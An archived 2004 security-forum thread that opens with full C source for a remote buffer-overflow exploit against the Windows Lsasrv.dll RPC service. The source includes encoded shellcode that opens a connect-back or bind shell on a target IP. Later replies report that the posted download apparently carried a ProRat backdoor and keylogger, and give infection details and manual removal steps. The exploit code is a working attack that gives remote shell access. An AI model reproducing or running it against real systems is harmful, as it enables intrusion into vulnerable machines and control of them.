Windows Lsasrv.dll Rpc Buffer Overflow

Full Version: Windows Lsasrv.dll Rpc Buffer Overflow

GovernmentSecurity.org > The Archives > Public Downloads

)Oni(

Apr 26 2004, 12:00 AM

CODE

#include <windows.h>
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")

unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";

unsigned char scode2[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define LEN 3500

char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];

int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;
LPSTR hostipc[40];
NETRESOURCE netResource;
unsigned short port;
unsigned long ip;
unsigned char* sc;

if (argc < 3) {
printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \bug discoveried by eEye,\n \
code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\n \
Usage: \n \
%s 0 targetip (Port ConnectBackIP ) \
----> attack 2k (tested on cn sp4,en sp4)\n \
%s 1 targetip (Port ConnectBackIP ) \
----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
printf("");
return 0;
}

target = argv[2];
sprintf((char *)hostipc,"\\\\%s\\ipc$",target);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;

ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
printf("Create NULL session failed\n");
// return 1;
}

hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("Can't find function.\n");
exit(0);
}

memset(buf, '\x90', LEN);

if(argc>4)
{

port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;

memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
}
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);

}
sc=scode2;
}
//attack all 2k sp3 version

memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
memcpy(&buf[2036], sc, strlen(sc));

//attack all 2k sp4 version
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844],"\x2b\x38\x03\x78",4);

memcpy(&buf[2856], sc, strlen(sc));

printf("shellcode size %d\n", strlen(sc));

for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;

if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
memcpy(&sendbuf[1980], "\xeb\xde",2);
}
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2);
ret=0;
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

printf("Ret value = %d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hNetapi);

return 0;
}

tweakz20

Apr 26 2004, 12:09 AM

Error: Invalid location of rundll32.exe in JPEG library. Cannot call action.

F34R

Apr 26 2004, 12:10 AM

same problem for me
bleh
:\

tweakz20

Apr 26 2004, 12:16 AM

heh.. this has the same thing as the one in downloads..
hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);

so as of about an hour ago, this became old

(wow, is it just me or did today bring alot of action in this community? lol)

Dwarf

Apr 26 2004, 12:29 AM

> Error: Invalid location of rundll32.exe in JPEG library. Cannot call action.

Got the same problem here

tweakz20

Apr 26 2004, 12:48 AM

http://www.governmentsecurity.org/forum/in...?showtopic=8069

there's a link where people got it working

h3llraz0r

Apr 26 2004, 02:46 AM

hmm, this might be a virus. after running it. services.exe wants to connect to a few numerous portd then my norton corporate AV shuts down. services.exe was dropped in c:\windows (hidden in fodler but not with 3rd party process viewer)and then this file showed up ktd32.atm. so i hex edit this file ktd32.atm and its the log from a keylogger that would have just started since the commands i typed after running the .exe are the only ones there.

everyone else might want to take a closer look at this file.

ladykidtwist

Apr 26 2004, 11:29 AM

my xp reboots upon initiating the exploit

xamilQ

Apr 26 2004, 11:59 AM

yep this is a lame virus .. dont download it

xamilQ

Apr 26 2004, 12:48 PM

It is ProRat BackDoor
Imo it uses following files in ur Systemroot (WINDOWS\System32\ for XP)
- winkey.dll < the key logger
- wininv.dll < the backdoor

I also found a reg key here:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft DirectX\Winsettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}

Maybe More Later

brOmstar

Apr 26 2004, 12:56 PM

in what version should be this backdoor?

for me it works perfect and gives shell after shell without an entry @reg it also starts no programs--i checked this with procexplorer + autoruns from www.sysinternals.com

)Oni(

Apr 26 2004, 02:10 PM

i didnt post this, someone used my nick to own u people.
please some moderator or administrator delete this post.

Dwarf

Apr 26 2004, 07:08 PM

I removed the files from my pc, but it still doesn't want to boot.

Somebody has any suggestions what to do? (without reinstalling windows)

tnx

xamilQ

Apr 26 2004, 09:16 PM

It drops:
C:\RECYCLER\S-1-5-21-1343024091-1078145449-1060284298-1003\Dc48.dll Geïnfecteerd Backdoor.Prorat.12 <cd0000.0.e>
C:\WINDOWS\system32\winkey.dll Geïnfecteerd Backdoor.Prorat.12 <cd0000.0.e>

Reg Keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y} "StubPath"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run "DirectX For Microsoft® Windows"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Delete the file ktd32.atm in the Windows folder if it exists. (keylog)

More Info:
http://securityresponse.symantec.com/avcen...oor.prorat.html
http://www.sophos.com/virusinfo/analyses/trojproratd.html
http://www.prorat.net
http://www.pestpatrol.com/pestinfo/p/prorat.asp
http://www.megasecurity.org/trojans/p/prorat/Prorat_all.html

Dwarf

Apr 26 2004, 09:44 PM

It drops some more files, but they are already anounced in this forum.

but i will have a look in my recycler directory.

tnx

Dwarf

Apr 26 2004, 10:25 PM

still get a blue error screen with the following msg:

stop: 0x0000007f (0x00000008,0x00000000,0x00000000,0x00000000)
unexpected_kernel_mode_trap

tweakz20

Apr 26 2004, 11:01 PM

PEOPLE stop downloading this!!!!!!

)oni(, the admins are slow sometimes, would you please edit your post to take out the download??

Dwarf

Apr 26 2004, 11:35 PM

Downloaded it yesterday already....only can reboor my pc anymore even if i deleted the virus.

somebody any suggestions?

tweakz20

Apr 27 2004, 01:35 AM

i dunno, this virus is stupid... i opened it and didn't notice a thing (i keep by registry RUN folders empty, works like a charm)

Dwarf

Apr 27 2004, 04:47 PM

Found it

my computer crashed and restarted all the time because of the virusscanner.

really shit and thats why i prefer to have none.

removed the virus myself.

[Sunny]

Apr 28 2004, 06:36 AM

How ?
I don't have the rights to delete the dll's . Even when i exploided Systemrights on my machine i have the message : Access denied .
Can you give me some hints ? Thank you

Flowby

Apr 28 2004, 11:40 AM

first stop the exe,
services.exe
than go after dll

[Sunny]

Apr 28 2004, 01:43 PM

this doesn't work for me :-(

C:\>kill.exe services
process #972 [services.exe] killed
process #196 [services.exe] killed

C:\WINDOWS\system32>del wininv.dll
C:\WINDOWS\system32\wininv.dll
Zugriff verweigert ( in English : Access denied )

Some other Methods ?

Dwarf

Apr 28 2004, 04:20 PM

What i did:

attrib -s -h c:\winnt\services.exe
attrib -s -h c:\winnt\system\sservices.exe
attrib -s -h c:\winnt\system32\fservices.exe

then open 3 dos command screens.

put in 1 screen: del c:\winnt\system\sservices.exe

but don't hit enter yet!....otherwise it will place the file back again

put in 2nd screen: del c:\winnt\system32\fservices.exe

No enter yet!

in the 3rd screen:

go into the c:\winnt directory and type:

kill services.exe

(if you do this in another directory it doesn't work coz there is another "real" services.exe in the c:\winnt\system32 directory)

Then when the process is killed your computer wants to shut down in 60 seconds.

so type in the 3rd dos screen del services.exe (in the c:\winnt directory)

and hit the enter button in the 1st and 2nd dos screen.

Then restart and remove the registry keys and/or the keylog files.

Good luck

[Sunny]

May 3 2004, 04:55 PM

yo thank u :-)
With your manual i removed the f*cking backdoor :-D

Starlight

May 3 2004, 05:13 PM

i have format me c:\

wy did you post something like that

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.